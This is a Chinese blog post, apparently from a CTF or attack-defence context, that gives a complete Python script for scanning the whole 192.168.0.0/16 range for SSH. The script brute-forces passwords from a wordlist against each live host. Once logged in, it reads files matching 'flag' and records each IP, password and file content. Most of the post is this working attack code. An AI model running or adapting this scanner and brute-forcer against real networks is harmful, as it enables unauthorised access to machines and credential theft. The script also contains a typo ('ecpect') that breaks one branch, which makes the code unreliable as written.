网络攻防之——Python实现ssh端口扫描并爆破

发表于 2019-04-08 更新于 2022-01-04 分类于网络攻防阅读次数：本文字数： 1.3k 阅读时长 ≈ 1 分钟

实现步骤

1、循环遍历出所有网段ip
2、利用多线程多并发同时探测22端口
3、把探测出来的存活机进行密码爆破
4、爆破成功则去拿到主机文件并保存ip、密码等信息
5、爆破不成功则记录该ip，进行后续操作。

代码示例

#!/usr/bin/python3

import pexpect
import threading
from socket import *

ipList = [];
flag = {};


loginKey = [pexpect.TIMEOUT, "#", "\$", "\?", "again"]

def getFlag(ip, password, pex):
	try:
		pex.sendline("ls / | grep *flag* | xargs cat");
		pex.expect(loginKey);
		flag[ip + " : " + password] =  str(pex.before);
	except:
		flag[ip + " : " + password] = " ";

	

def getPassword(ip):
	try:
		for p in open("password"):
			pex = pexpect.spawn("ssh uuu@" + ip, timeout = 1);
			res = pex.expect(loginKey);
			if res == 3:
				pex.sendline("yes");
				res = pex.ecpect(loginKey);
			
			p = p.strip();
			pex.sendline(p);
			res = pex.expect(loginKey);
			if res == 1 or res == 2:
				getFlag(ip, p, pex);
				return True;
	except:
		pass;
	ipList.append(ip);
	return False;


def scan(ip):
	s = socket(AF_INET, SOCK_STREAM);
	s.settimeout(1);
	try:
		s.connect((ip, 22));
		print(ip);
		getPassword(ip);
	except:
		pass;
	finally:
		s.close();



for a in range(1, 255):
	for b in range(1,255):
		while len(threading.enumerate()) >= 255:
			pass;
		ip = "192.168." + str(a) + "." + str(b)
		threading.Thread(target=scan, args=(ip,)).start();

while len(threading.enumerate()) > 1:
	pass;
print(ipList);
print(flag);